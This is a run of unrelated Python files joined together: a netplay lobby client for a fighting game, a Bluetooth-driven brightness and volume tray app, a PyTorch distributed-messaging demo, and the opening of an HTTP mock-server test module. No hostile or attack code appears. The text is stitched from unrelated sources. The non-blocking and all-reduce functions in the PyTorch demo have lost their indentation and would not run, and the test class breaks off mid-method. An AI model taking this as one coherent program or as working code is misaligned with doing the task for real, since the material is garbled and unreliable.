                if i[2] == self.watch_player or i[3] == self.watch_player:
                    self.watch_match(name="%s vs %s" % (i[0], i[1]), ip=i[4])
    else:
        n = []
        for k,v in self.widget_index.items():
            if v in self.match_list.children:
                v.parent.remove_widget(v)
                n.append(k)
        for i in n:
            self.widget_index.pop(i)
    # if any widgets in the list don't correspond to json items, remove them
    n = []
    for k in self.widget_index.keys():
        ok = False
        if k != 'w' and k != 'c' and k != 'i':
            for i in j['challenges']:
                if k == i[1]:
                    ok = True
            for i in j['idle']:
                if k == i[1]:
                    ok = True
            for i in j['playing']:
                if k == (i[2],i[3]) or k == (i[3],i[2]):
                    ok = True
            if ok is False:
                n.append(k)
    for i in n:
        self.widget_index.get(i).parent.remove_widget(self.widget_index.get(i))
        self.widget_index.pop(i)
    if first:
        self.app.lobby_button()
        self.lobby_thread_flag = 0
        self.lobby_updater = threading.Thread(
            target=self.auto_refresh, daemon=True)  # netplay watchdog
        self.lobby_updater.start()
    else:
        # update the lobby button label with the pending challenge count
        if len(self.challenge_list.children) > 0:
            self.app.update_lobby_button('LOBBY %s (%s)' % (self.code,len(self.challenge_list.children) - 1))
        else:
            self.app.update_lobby_button('LOBBY %s ' % self.code)
def follow_player(self,obj,i):
    """Toggle spectate-follow for lobby player `i`.

    When following, we auto-watch any match this player joins (see the
    `playing` handling in the lobby refresh).  Only one player can be
    followed at a time, so all other FOLLOW buttons are reset first.

    obj: the Kivy button that fired the event (unused).
    i:   lobby id of the player row whose button was pressed.
    """
    w = self.widget_index.get(i).ids['WatchBtn']
    if w.text == 'FOLLOW':
        self.watch_player = i
        for k,v in self.widget_index.items(): # clear first
            try:
                if v.parent == self.player_list and k != self.player_id:
                    v.ids['WatchBtn'].text = 'FOLLOW'
            except KeyError:
                # Header/dummy rows have no 'WatchBtn' id.
                pass
        w.text = 'FOLLOWING'
    else:
        # Already following this player: un-follow.
        self.watch_player = None
        w.text = 'FOLLOW'
def auto_refresh(self):
    """Background watchdog loop: poll the lobby server every ~2 s.

    Runs in a daemon thread.  Exits when `lobby_thread_flag` is set
    (see exit()), after 3 consecutive connection failures, or when the
    server reports anything other than 'OK'.
    """
    while True:
        if self.lobby_thread_flag != 0:
            break
        p = {
            'action': 'status',
            'id': self.code,
            'p': self.player_id,
            'secret': self.secret
        }
        try:
            req = requests.get(url=LOBBYURL, params=p, timeout=5)
            req.raise_for_status()
        except (requests.exceptions.ConnectionError,requests.exceptions.Timeout) as e:
            logging.warning('LOBBY REFRESH: %s' % e.__class__)
            if self.get_attempts < 2:
                # Tolerate transient network errors (up to 2 retries).
                self.get_attempts += 1
                logging.warning('GET_ATTEMPTS: %s' % self.get_attempts)
            else:
                logging.warning('GET_ATTEMPTS: %s' % self.get_attempts)
                self.exit(msg='Error: %s' % e.__class__)
                break
        else:
            r = req.json()
            if r['msg'] == 'OK':
                # Rebuild the lobby UI from the fresh status payload.
                self.create(r)
                time.sleep(2)
            else:
                self.exit(msg=r['msg'])
                break
def exit(self,msg=None):
    """Leave the lobby: stop the refresh thread, notify the server
    (best effort), reset all lobby state, and update the app UI.

    msg: optional text shown to the user in a modal after leaving.
    """
    self.lobby_thread_flag = 1  # signals auto_refresh() to stop
    try:
        p = {
            'action': 'leave',
            'id': self.code,
            'p': self.player_id,
            'secret': self.secret
        }
        requests.get(url=LOBBYURL, params=p)
    except:
        # Best-effort: we are leaving regardless of whether the server
        # heard us.  NOTE(review): bare except also swallows
        # KeyboardInterrupt/SystemExit; `except Exception` would be safer.
        pass
    self.secret = None
    self.watch_player = None
    self.player_id = None
    self.code = None
    self.type = None
    self.lobby_updater = None
    self.get_attempts = 0
    self.app.remove_lobby_button()
    self.app.LobbyList.refresh()
    if msg:
        popup = GameModal()
        popup.modal_txt.text = msg
        popup.close_btn.text = 'Close'
        popup.close_btn.bind(on_release=popup.dismiss)
        popup.open()
    # Set Rich Presence to main menu again
    if self.app.discord is True:
        presence.menu()
    self.app.game.update_stats(once=True)
def send_challenge(self, obj, name, id, *args):
    """Challenge another lobby player and start hosting the match.

    Clears any follow state, remembers who we challenged, shows a
    'Challenging ...' modal, and spawns a daemon thread that hosts the
    game on the configured netplay port.

    obj:  the Kivy button that fired the event (unused).
    name: display name of the challenged player.
    id:   lobby id of the challenged player.
    """
    self.watch_player = None
    for k,v in self.widget_index.items():
        try:
            if k != self.player_id and v.parent == self.player_list:
                v.ids['WatchBtn'].text = "FOLLOW"
        except KeyError:
            # Header/dummy rows have no 'WatchBtn' id.
            pass
    self.challenge_name = name
    self.challenge_id = id
    popup = GameModal()
    popup.modal_txt.text = 'Challenging %s' % self.challenge_name
    popup.close_btn.text = 'Stop Playing'
    popup.close_btn.bind(on_release=partial(
        self.dismiss, p=popup))
    self.active_pop = popup
    popup.open()
    caster = threading.Thread(
        target=self.app.game.host, args=[self, app_config['settings']['netplay_port']], daemon=True)
    caster.start()
def set_ip(self):
    """Publish our host address to the lobby server ('challenge' action)
    so the challenged player can connect to us."""
    pyperclip.copy('') #erase IP address from clipboard
    p = {
        't': self.challenge_id,
        'p': self.player_id,
        'action': 'challenge',
        'id': self.code,
        'ip': self.app.game.adr,
        'secret': self.secret
    }
    print(p)  # NOTE(review): leftover debug print
    c = requests.get(url=LOBBYURL, params=p).json()
    print(c)  # NOTE(review): leftover debug print
def accept_challenge(self, obj, name, id, ip, *args):
    """Accept an incoming challenge: join the host and tell the server.

    Clears follow state, joins `ip` in a daemon thread, sends a
    'pre_accept' notification in another thread, and shows a
    'Connecting ...' modal.

    obj:  the Kivy button that fired the event (unused).
    name: challenger's display name.
    id:   challenger's lobby id.
    ip:   host address to join.
    """
    self.watch_player = None
    for k,v in self.widget_index.items():
        try:
            if k != self.player_id and v.parent == self.player_list:
                v.ids['WatchBtn'].text = "FOLLOW"
        except KeyError:
            # Header/dummy rows have no 'WatchBtn' id.
            pass
    caster = threading.Thread(target=self.app.game.join, args=[
        ip, self, id], daemon=True)
    caster.start()
    threading.Thread(target=self.send_pre_accept,args=[self.player_id,id]).start()
    popup = GameModal()
    popup.modal_txt.text = 'Connecting to %s' % name
    popup.close_btn.text = 'Stop Playing'
    popup.close_btn.bind(on_release=partial(
        self.dismiss, p=popup))
    self.active_pop = popup
    popup.open()
def send_pre_accept(self,id,target):
    """Notify the lobby server that `id` is accepting `target`'s
    challenge ('pre_accept').  Runs in its own thread (see
    accept_challenge)."""
    p = {
        't': target,
        'p': id,
        'action': 'pre_accept',
        'id': self.code,
        'secret': self.secret
    }
    print(p)  # NOTE(review): leftover debug print
    c = requests.get(url=LOBBYURL, params=p).json()
    print(c)  # NOTE(review): leftover debug print
def confirm(self, obj, r, d, p, n, t=None, *args):
    """Apply the rollback/delay values chosen in the frame dialog.

    obj: the Kivy button that fired the event (unused).
    r:   rollback text input widget.
    d:   delay text input widget.
    p:   the FrameModal popup to dismiss.
    n:   opponent display name.
    t:   challenger id when accepting; triggers the MBAA-ready watcher.

    Non-numeric input raises ValueError in int() and is silently
    ignored, leaving the dialog open.
    """
    try:
        self.app.game.confirm_frames(int(r.text),int(d.text))
        self.opponent = n
        self.active_pop.modal_txt.text += "\nConnected to: %s, %s Delay & %s Rollback" % (
            n, d.text, r.text)
        p.dismiss()
        if t: #if accepting, run MBAA check
            threading.Thread(target=self.wait_for_MBAA, args=[t]).start()
    except ValueError:
        pass
def wait_for_MBAA(self, t):
    """Wait until the game reaches character select, then confirm the
    accepted challenge ('accept') with the lobby server.

    t: lobby id of the challenging player; stored as current_player.

    NOTE(review): memory value 20 at 0x54EEE8 presumably means
    "character select screen" — confirm against the game integration.
    The loop also spins without sleeping while waiting.
    """
    while True:
        if self.app.game.playing is True and self.active_pop != None:
            if self.app.game.read_memory(0x54EEE8) == 20: #wait for char select
                resp = {
                    't': t,
                    'p': self.player_id,
                    'action': 'accept',
                    'id': self.code,
                    'secret': self.secret
                }
                print(resp)  # NOTE(review): leftover debug print
                c = requests.get(url=LOBBYURL, params=resp).json()
                print(c)  # NOTE(review): leftover debug print
                self.current_player = t
                break
        else:
            # Game closed or modal dismissed: give up.
            break
def watch_match(self, obj=None, name="", ip="", *args):
    """Start spectating the match hosted at `ip`.

    Clears follow state, spawns a daemon thread running the game's
    spectate mode, and shows a 'Watching ...' modal.

    obj:  the Kivy button that fired the event (may be None when called
          programmatically from the follow logic).
    name: match label shown in the modal.
    ip:   host address to spectate.
    """
    self.watch_player = None
    for k,v in self.widget_index.items():
        try:
            if k != self.player_id and v.parent == self.player_list:
                v.ids['WatchBtn'].text = "FOLLOW"
        except KeyError:
            # Header/dummy rows have no 'WatchBtn' id.
            pass
    popup = GameModal()
    caster = threading.Thread(
        target=self.app.game.watch, args=[ip,self], daemon=True)
    self.active_pop = popup
    popup.modal_txt.text = 'Watching %s' % name
    popup.close_btn.text = 'Stop watching'
    popup.close_btn.bind(on_release=partial(
        self.dismiss, p=popup))
    popup.open()
    self.app.offline_mode = 'Spectating' #needs to be an offline mode for lobby multitasking
    caster.start()
def set_frames(self, name, delay, ping, target=None, mode="Versus", rounds=2):
    """Open the rollback/delay selection dialog after a connection.

    name:   opponent display name.
    delay:  measured network delay (frames).
    ping:   measured ping in ms.
    target: challenger id when accepting (forwarded to confirm()).
    mode:   game mode label for the dialog.
    rounds: rounds per game; 0 hides the rounds note.
    """
    popup = FrameModal()
    if rounds != 0:
        rounds = ", %s rounds per game" % rounds
    else:
        rounds = ''
    popup.frame_txt.text = '[b]Connected to %s[/b]\n[size=14][u]%s mode%s[/u]\nNetwork delay: %s (%s ms)\nSuggested: Delay %s, Rollback %s[/size]' % (
        name, mode, rounds, delay, ping, self.app.game.ds, self.app.game.rs)
    # Pre-fill the inputs with the game's suggested values.
    popup.r_input.text = str(self.app.game.rs)
    popup.d_input.text = str(self.app.game.ds)
    popup.start_btn.bind(on_release=partial(
        self.confirm, p=popup, r=popup.r_input, d=popup.d_input, n=name, t=target))
    popup.close_btn.bind(on_release=partial(
        self.dismiss, p=popup))
    popup.open()
def error_message(self,e):
    """Show a modal listing the error lines in `e` (iterable of str),
    replacing any currently active popup."""
    self.error = True
    popup = GameModal()
    for i in e:
        popup.modal_txt.text += i + '\n'
    popup.close_btn.bind(on_release=partial(self.dismiss_error,p = popup))
    popup.close_btn.text = "Close"
    if self.active_pop != None:
        # Replace whatever modal was open with the error modal.
        self.active_pop.dismiss()
        self.active_pop = None
    popup.open()
def dismiss_error(self,obj,p):
    """Close the error modal `p` and clear the error flag."""
    p.dismiss()
    self.error = False
# TODO prevent players from dismissing caster until MBAA is open to avoid locking issues
def dismiss(self, obj, p, *args):
    """Cancel the current match/challenge: kill the caster process,
    clear challenge state, tell the server the match ended, and close
    the popup(s).

    obj: the Kivy button that fired the event (unused).
    p:   the popup whose close button was pressed.
    """
    self.app.game.kill_caster()
    self.challenge_name = None
    self.opponent = None
    self.challenge_id = None
    r = {
        'action': 'end',
        'p': self.player_id,
        'id': self.code,
        'secret': self.secret
    }
    requests.get(url=LOBBYURL, params=r)
    p.dismiss()
    if self.active_pop != None:
        self.active_pop.dismiss()
        self.active_pop = None
def invite_link(self,*args):
    """Copy the lobby invite URL to the clipboard and flash a
    confirmation in the UI (in a background thread)."""
    pyperclip.copy('https://invite.meltyblood.club/%s' % self.code)
    threading.Thread(target=self.invite_ui).start()
def invite_ui(self):
    """Briefly replace the lobby-code label with 'Link copied to
    clipboard', restoring the original text after 2 s.  The guard keeps
    concurrent clicks from saving the placeholder as the 'original'."""
    if self.lobby_code.text != 'Link copied to clipboard':
        t = self.lobby_code.text
        self.lobby_code.text = 'Link copied to clipboard'
        time.sleep(2)
        self.lobby_code.text = t
from __future__ import annotations
import _thread
import os
import re
from datetime import datetime, timedelta
import PySimpleGUIQt as sg
import asyncio
import threading
import sys
import brightness_control
import volume_control
import audio_listener
from serialization import *
from calibration import *
from logger import Logger
# https://docs.microsoft.com/en-us/windows/win32/api/endpointvolume/nn-endpointvolume-iaudioendpointvolume
# Monitor handles are queried once at import time; the slider counts
# below control how many device rows the window renders.
monitors = brightness_control.getMonitors()
num_displays = 1
num_audio = 1
def font(size: int):
    """Return a PySimpleGUI font spec for Consolas at the given size."""
    return f'Consolas {size}'
# Global GUI theme and the three font presets used throughout the layout.
sg.theme("Dark")
header_font = font(24)
body_font = font(14)
small_body_font = font(10)
def make_window():
    """Build and return the main configuration window.

    Layout: a displays column (one slider + enable checkbox per
    display), an audio column (slider, enable, and 'is speaker'
    checkboxes per device), calibration buttons, and a debug editor for
    viewing/applying raw calibration data.  Element keys follow the
    'display<i>'/'audio<i>' (+ '.text'/'.enabled'/'.speaker') scheme
    parsed by parse_key().
    """
    full_size = (1000, 760) # width, height
    monitor_image = "monitor_image.png"
    speaker_image = "speaker_image.png"
    left_col = [[sg.Image(monitor_image)], [sg.Text("\nDisplays\n", font=header_font)]]
    for i in range(num_displays):
        key = 'display' + str(i)
        image_col = [[sg.Text("\n", font=font(2))],
                     [sg.Text("Display\n", font=body_font)]]
        settings_col = [[sg.Text("\n", font=font(6))],
                        [sg.Slider(range=(0, 100), orientation='h', key=key,
                                   disabled=False, enable_events=True),
                         sg.Text("", key=key + '.text', font=small_body_font)],
                        [sg.Checkbox("Enable !surprised", key=key + '.enabled',
                                     enable_events=True, font=small_body_font, size=(23, 1.75))]]
        device_unit = [[sg.Column(image_col, element_justification='c'), sg.Column(settings_col)]]
        left_col.append([sg.Column(device_unit)])
    right_col = [[sg.Image(speaker_image)], [sg.Text("\nAudio\n", font=header_font)]]
    for i in range(num_audio):
        key = 'audio' + str(i)
        image_col = [[sg.Text("\n", font=font(2))],
                     [sg.Text("Speaker\n", font=body_font)]]
        settings_col = [[sg.Text("\n", font=font(6))],
                        [sg.Slider(range=(0, 100), orientation='h', key=key,
                                   disabled=False, enable_events=True),
                         sg.Text("", key=key + '.text', font=small_body_font)],
                        [sg.Checkbox("Enable !surprised", key=key + '.enabled',
                                     enable_events=True, font=small_body_font, size=(23, 1.25))],
                        [sg.Checkbox("Is speaker", key=key + '.speaker',
                                     enable_events=True, font=small_body_font)]]
        device_unit = [[sg.Column(image_col, element_justification='c'), sg.Column(settings_col)]]
        right_col.append([sg.Column(device_unit)])
    calibrate_button1 = sg.Button('Calibrate display', font=body_font, size=(300, 70), button_color=("#dedede", "#3f618a"))
    calibrate_button2 = sg.Button('Calibrate audio', font=body_font, size=(300, 70), button_color=("#dedede", "#3f618a"))
    debug_editor = sg.Multiline('', key='debug', font=small_body_font, size=(800, 100))
    clear_button = sg.Button('Clear', font=small_body_font, size=(160, 40), button_color=("#dedede", "#c74d42"))
    debug_apply = sg.Button("Apply calibration data", key='debug.apply', font=small_body_font, size=(300, 40))
    log_button = sg.Button('View logs', key='debug.logs', font=small_body_font, size=(160, 40))
    button_container = [[sg.Stretch(), calibrate_button1, sg.Text('\t'), calibrate_button2, sg.Stretch()],
                        [debug_editor],
                        [sg.Stretch(), clear_button, sg.Stretch(), debug_apply, sg.Stretch(), log_button, sg.Stretch()]]
    layout = [[sg.Stretch(),
               sg.Column(left_col, element_justification='c'),
               sg.Stretch(),
               sg.Stretch(),
               sg.Column(right_col, element_justification='c'),
               sg.Stretch()],
              [sg.Column(button_container, element_justification='c')]]
    scrollable = [[sg.Column(layout, size=full_size, scrollable=True)]]
    window = sg.Window("!surprised", scrollable, size=full_size, icon="logo.ico",
                       resizable=False, disable_minimize=True)
    return window
def make_tray():
    """Create the system tray icon with a Configure/Exit menu."""
    menu = ['', ['&Configure', '---', 'E&xit']]
    tooltip = '!surprised'
    tray = sg.SystemTray(menu, tooltip=tooltip, filename="logo.ico")
    return tray
def show_popup():
    """Show a blocking 'Calibration Successful!' confirmation popup."""
    choice, _ = sg.Window('Success!',
                          [[sg.Text('\nCalibration Successful!\n', font=small_body_font)]],
                          disable_minimize=True, resizable=False, icon="logo.ico", size=(250, 150))\
        .read(close=True)
def show_confirmation():
    """Ask the user to confirm clearing calibration data.

    Returns True only when the 'Yes' button was pressed.
    """
    choice, _ = sg.Window('Are you sure?',
                          [[sg.Text('\nDo you want to clear all calibration data?\n', font=small_body_font)],
                           [sg.Stretch(),
                            sg.Button('Yes', font=small_body_font, size=(100, 40), button_color=("#dedede", "#c74d42")),
                            sg.Button('No', font=small_body_font, size=(100, 40), button_color=("#dedede", "#3f618a")),
                            sg.Stretch()]],
                          disable_minimize=True, resizable=False, icon="logo.ico", size=(400, 150))\
        .read(close=True)
    return choice == 'Yes'
def read(window: sg.Window | None, tray: sg.SystemTray, timeout=100) -> tuple[str, dict | None]:
    """Poll the window (if open) and then the tray for one event.

    Window events take priority; the tray is only consulted when the
    window read times out (or there is no window).  Tray reads return an
    empty values dict so callers can treat both uniformly.
    """
    if window is not None:
        event, values = window.read(timeout)
        if event != sg.TIMEOUT_EVENT:
            return event, values
    event = tray.read(timeout)
    return event, {}
def check_slider_changes(event: str, values: dict[str, int], no_refresh_until: dict[str, datetime]) -> bool:
    """Apply a slider-move event to the corresponding device.

    Returns True when `event` was a display/audio slider (and the
    hardware was updated), False for anything else.  Keys with a suffix
    ('.enabled', '.text', ...) are checkboxes/labels, not sliders.
    """
    if not event or not values:
        return False
    prefix, i, suffix = parse_key(event)
    if suffix:
        return False
    elif prefix == 'display':
        value = values[event]
        brightness_control.setBrightness(value)
    elif prefix == 'audio':
        value = values[event]
        volume_control.setVolume(value)
    else:
        return False
    # Suppress hardware polling for this slider for 500 ms so the UI
    # doesn't snap back while the device is still applying the change.
    no_refresh_until[event] = datetime.now() + timedelta(milliseconds=500)
    return True
def refresh_values(window: sg.Window | None, no_refresh_until: dict[str, datetime]):
    """Sync the sliders with the actual device brightness/volume.

    Sliders listed in `no_refresh_until` are skipped until their
    deadline passes (set by check_slider_changes after a user drag).
    """
    def should_refresh(key):
        # Expired deadlines are removed as a side effect.
        if key in no_refresh_until:
            if datetime.now() < no_refresh_until[key]:
                # print(key)
                return False
            else:
                del no_refresh_until[key]
        return True
    if window is None:
        return
    for i in range(num_displays):
        key = "display" + str(i)
        if should_refresh(key):
            slider = window[key]
            value = brightness_control.getBrightness2(i)
            slider.update(value)
    for i in range(num_audio):
        key = "audio" + str(i)
        if should_refresh(key):
            slider = window[key]
            value = volume_control.getVolume()
            slider.update(value)
def update_slider_text(window: sg.Window | None, values: dict[str, int]):
    """Mirror each slider's current value into its '<key>.text' label
    as a percentage."""
    def update(key: str):
        if key in values:
            value = values[key]
            window[key + '.text'].update(str(value) + '%')
    if window is None:
        return
    for i in range(num_displays):
        update("display" + str(i))
    for i in range(num_audio):
        update("audio" + str(i))
def parse_key(key: str) -> tuple[str, int, str]:
    """Split a GUI element key into (prefix, index, suffix).

    Keys look like 'display0', 'audio1.enabled': a word prefix, a
    numeric device index, and an optional dotted suffix.  Returns
    ('', -1, '') when the key does not match that shape (e.g. 'Clear',
    'debug.apply').
    """
    # Lazy prefix and escaped dot: the original greedy pattern
    # r'^(.+)([0-9]+).?([A-Za-z]*)$' split multi-digit indices, parsing
    # 'display12' as ('display1', 2, '') instead of ('display', 12, '').
    match = re.match(r'^(.+?)([0-9]+)\.?([A-Za-z]*)$', key)
    if match is None:
        return '', -1, ''
    prefix, index, suffix = match.groups()
    return prefix, int(index), suffix
async def calibrate(client, brightness_points, volume_points, enabled):
    """Record one calibration sample from the BLE device.

    Pass a list for `brightness_points` or `volume_points` (and None for
    the other) to choose which measurement is taken; the new point is
    appended in place via add_point.
    """
    if brightness_points is not None:
        add_point(brightness_points, await getBrightnessPoint(client))
    if volume_points is not None:
        add_point(volume_points, await getVolumePoint(client))
def deserialize_calibration():
    """Load saved calibration state, falling back to safe defaults.

    Returns (brightness_points, volume_points, enabled) where the point
    lists are empty and all features are disabled on a first run or
    when the saved data cannot be read.
    """
    try:
        brightness_points, volume_points, enabled = deserialize()
    except Exception:
        # FIX: was a bare `except:`, which also swallowed
        # KeyboardInterrupt/SystemExit.
        brightness_points = []
        volume_points = []
        enabled = {'display0.enabled': False, 'audio0.enabled': False, 'audio0.speaker': False}
    return brightness_points, volume_points, enabled
async def run(logger, start_in_background):
    """Main application loop.

    Starts the BLE client on a background asyncio loop, then polls the
    window/tray for events: slider moves, calibration, debug editing,
    and tray show/exit.  Returns when Exit is chosen; the BLE daemon
    interrupts the main thread on device disconnect so the caller can
    restart us.

    logger: Logger whose buffer backs the 'View logs' popup.
    start_in_background: when True, start tray-only (no window).
    """
    async def connect():
        await client.discover_and_connect()
    def apply_changes():
        # Persist calibration state and mirror it into the debug editor
        # and the enable checkboxes.
        data = (brightness_points, volume_points, enabled)
        serialize(data)
        window['debug'].update(repr(data))
        for key in enabled:
            window[key].update(enabled[key])
    def set_title(additional_text):
        nonlocal current_title
        title = '!surprised'
        if additional_text:
            title += ' [{}]'.format(additional_text)
        if title != current_title:
            # Go through the Qt handle to retitle the existing window.
            window.QT_QMainWindow.setWindowTitle(title)
            current_title = title
    current_title = '!surprised'
    async def auto_adjust_subscribe():
        # Resolves only when the BLE device disconnects.
        future = asyncio.Future()
        def on_disconnect(_):
            print("Disconnected.")
            future.set_result(True)
        def adjust(points, fn, value):
            # Needs at least two calibration points to map sensor
            # readings onto a device setting.
            if len(points) >= 2:
                points.sort(key=firstElement)
                x = listOfFirst(points)
                y = listOfSecond(points)
                fn(value, x, y)
        def set_brightness(new, old):
            if enabled['display0.enabled']:
                adjust(brightness_points, brightness, new)
        def set_volume(new, old):
            async def do():
                # Speaker mode: don't change volume while audio is
                # playing; ask the device to hold instead.
                if enabled['audio0.speaker'] and await audio_listener.is_playing_audio():
                    await client.pause_volume(old)
                    print('Pausing volume update')
                else:
                    adjust(volume_points, volume, new)
            if enabled['audio0.enabled']:
                asyncio.ensure_future(do())
        await client.subscribe(set_brightness, set_volume, on_disconnect)
        await future
    async def auto_adjust_daemon():
        try:
            await connect()
            await auto_adjust_subscribe()
        finally:
            # Device gone: shut down Qt and break the main thread out of
            # its loop so the outer caller can restart run().
            if client is not None:
                sg.Window.QTApplication.exit()
                _thread.interrupt_main()
    client = NsBleClient()
    # The BLE daemon runs on its own event loop in a daemon thread.
    loop = asyncio.new_event_loop()
    thread = threading.Thread(target=loop.run_forever, daemon=True)
    thread.start()
    loop.call_soon_threadsafe(asyncio.create_task, auto_adjust_daemon())
    brightness_points, volume_points, enabled = deserialize_calibration()
    if start_in_background:
        window = None
        is_new_window = False
    else:
        window = make_window()
        is_new_window = True
    tray = make_tray()
    no_refresh_until = {}
    try:
        while True:
            await asyncio.sleep(0.01)
            event, values = read(window, tray, 50 if window is not None else None)
            update_slider_text(window, values)
            if event in ['debug.apply']:
                try:
                    # NOTE(review): eval of editor text -- local user
                    # input only, but ast.literal_eval would be safer.
                    brightness_points, volume_points, enabled = eval(values['debug'])
                    assert(list == type(brightness_points) == type(volume_points))
                    assert(dict == type(enabled))
                    apply_changes()
                except Exception as e:
                    sg.PopupError(e)
            if event in ['debug.logs']:
                sg.PopupScrolled(logger.get(), size=(120, 50), title="Logs", non_blocking=True)
            elif not check_slider_changes(event, values, no_refresh_until):
                refresh_values(window, no_refresh_until)
            if is_new_window:
                # Freshly (re)opened window: push current state into it.
                is_new_window = False
                apply_changes()
            if window is not None:
                if client is None or not client.is_connected:
                    set_title("not connected")
                else:
                    set_title("")
            if event != sg.TIMEOUT_EVENT:
                # print(event, values)
                if window is not None and client is not None:
                    if event in [sg.WIN_CLOSED]:
                        window.close()
                        window = None
                    if event in ["Calibrate display"] and client.is_connected:
                        await calibrate(client, brightness_points, None, enabled)
                        apply_changes()
                        show_popup()
                    if event in ["Calibrate audio"] and client.is_connected:
                        await calibrate(client, None, volume_points, enabled)
                        apply_changes()
                        show_popup()
                    if event in ["Clear"]:
                        if show_confirmation():
                            brightness_points = []
                            volume_points = []
                            apply_changes()
                    if event in values and type(values[event]) == bool:
                        # Checkbox toggles arrive keyed by element key.
                        enabled[event] = values[event]
                        apply_changes()
                else:
                    # Tray-only mode: reopen the window on request.
                    if event in ["Configure", sg.EVENT_SYSTEM_TRAY_ICON_DOUBLE_CLICKED]:
                        window = make_window()
                        is_new_window = True
                        continue
                if event in ["Exit"]:
                    break
    finally:
        tray.close()
        if window is not None:
            window.close()
        if client is not None and client.is_connected:
            # Null out `client` first so the daemon's finally-block
            # doesn't also try to tear things down.
            disconnect = client.client.disconnect
            client = None
            await disconnect()
if __name__ == "__main__":
    # Entry point: attach logging, enforce a single instance, then keep
    # restarting run(); Ctrl+C demotes the app to background/tray mode.
    logger = Logger()
    logger.attach()
    from singleton import SingleInstance
    me = SingleInstance()
    # FIX: the original `any(sys.argv) in ['-b', '--background']`
    # compared a bool against the flag strings and was always False, so
    # -b/--background never worked.
    background = any(a in ('-b', '--background') for a in sys.argv[1:])
    while True:
        try:
            asyncio.run(run(logger, background))
        except KeyboardInterrupt:
            print("Keyboard interrupt. Restarting in background...")
            background = True
        else:
            sys.exit()
"""run.py"""
#!/usr/bin/env python3
import os
import torch
import torch.distributed as dist
from torch.multiprocessing import Process
# blocking
def run_blocking(rank, size):
    """ Blocking point-2-point communication """
    # Rank 0 sends a one-element tensor (value 1.0) to rank 1; both
    # dist.send and dist.recv block until the transfer completes.
    tensor = torch.zeros(1)
    if rank == 0:
        tensor += 1
        # Send the tensor to process 1
        dist.send(tensor=tensor, dst=1)
    else:
        # Receive tensor from process 0
        dist.recv(tensor=tensor, src=0)
    print("Rank ", rank, ' has data ', tensor[0])
# non-blocking
def run_nonblocking(rank, size):
""" non-Blocking point-2-point communication """
tensor = torch.zeros(1)
req = None
if rank == 0:
tensor += 1
# Send the tensor to process 1
req = dist.isend(tensor=tensor, dst=1)
print("Rank 0 started sending")
else:
# Receive tensor from process 0
req = dist.irecv(tensor=tensor, src=0)
req.wait()
print("Rank ", rank, ' has data ', tensor[0])
# All-reduce
def run(rank, size):
""" simple E2E communication """
group = dist.new_group([0, 1])
tensor = torch.ones(1)
dist.all_reduce(tensor, op=torch.distributed.ReduceOp.SUM, group=group)
print("Rank ", rank, " has data ", tensor[0])
def init_process(rank, size, fn, backend='gloo'):
    """ Initialize the distributed environment """
    # Rendezvous over TCP on localhost; every worker must use the same
    # master address/port.  init_process_group blocks until all `size`
    # processes have joined, then the demo function runs.
    os.environ['MASTER_ADDR'] = '127.0.0.1'
    os.environ['MASTER_PORT'] = '29500'
    dist.init_process_group(backend, rank=rank, world_size=size)
    fn(rank, size)
if __name__ == "__main__":
    # Spawn 2 worker processes running the all-reduce demo (`run` is the
    # last definition above) and wait for both to finish.
    size = 2
    processes = []
    for rank in range(size):
        p = Process(target=init_process, args=(rank, size, run))
        p.start()
        processes.append(p)
    for p in processes:
        p.join()
"""
The MIT License (MIT)
Copyright (c) 2015 kelsoncm
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
from unittest import TestCase
import socket
from zipfile import ZipFile, ZipInfo
from threading import Thread
from http.server import BaseHTTPRequestHandler, HTTPServer
from http.client import HTTPException
from python_brfied.shortcuts.sync_http import get, get_json, get_zip, get_zip_content, get_zip_csv_content, \
get_zip_fwf_content
from pyfwf.descriptors import FileDescriptor, HeaderRowDescriptor, DetailRowDescriptor
from pyfwf.columns import CharColumn
from tests import FILE01_CSV_EXPECTED, FILE01_CSV_EXPECTED_BINARY, FILE01_CSV_EXPECTED_LATIN1
from tests import FILE02_JSON_EXPECTED, FILE02_JSON_EXPECTED_BINARY, FILE02_JSON_EXPECTED_LATIN1
from tests import ZIP_EXPECTED, JSON_EXPECTED, CSV_EXPECTED
from tests import FWF_EXPECTED, FILE_DESCRIPTOR
def get_free_port():
    """Ask the OS for a free ephemeral localhost port and return it.

    The probe socket is closed immediately, so the port is available for
    the mock HTTP server to bind (a tiny reuse race is acceptable here).
    """
    with socket.socket(socket.AF_INET, type=socket.SOCK_STREAM) as probe:
        probe.bind(('localhost', 0))
        _, port = probe.getsockname()
    return port
class MockServerRequestHandler(BaseHTTPRequestHandler):
    """Serves fixture files from assets/ keyed by the URL's last path
    segment; unknown names get a 404 with FILE_NOT_FOUND_ERROR_MESSAGE.
    All logging is silenced to keep test output clean."""

    # Fixture payloads are read once, at class-definition time, relative
    # to the test working directory.
    with open("assets/file01.csv", "rb") as f:
        file01_csv = f.read()
    with open("assets/file01.zip", "rb") as f:
        file01_zip = f.read()
    with open("assets/file02.json", "rb") as f:
        file02_json = f.read()
    with open("assets/file02.zip", "rb") as f:
        file02_zip = f.read()
    with open("assets/example01_are_right.fwf.zip", "rb") as f:
        example01_are_right_fwf_zip = f.read()
    # Maps the final URL segment to the payload bytes served for it.
    files = {'file01_csv': file01_csv, 'file01_zip': file01_zip, 'file02_json': file02_json, 'file02_zip': file02_zip,
             "example01_are_right.fwf.zip": example01_are_right_fwf_zip}
    FILE_NOT_FOUND_ERROR_MESSAGE = 'File not found'

    def __init__(self, request, client_address, server):
        super(MockServerRequestHandler, self).__init__(request, client_address, server)

    def log_error(self, format, *args):
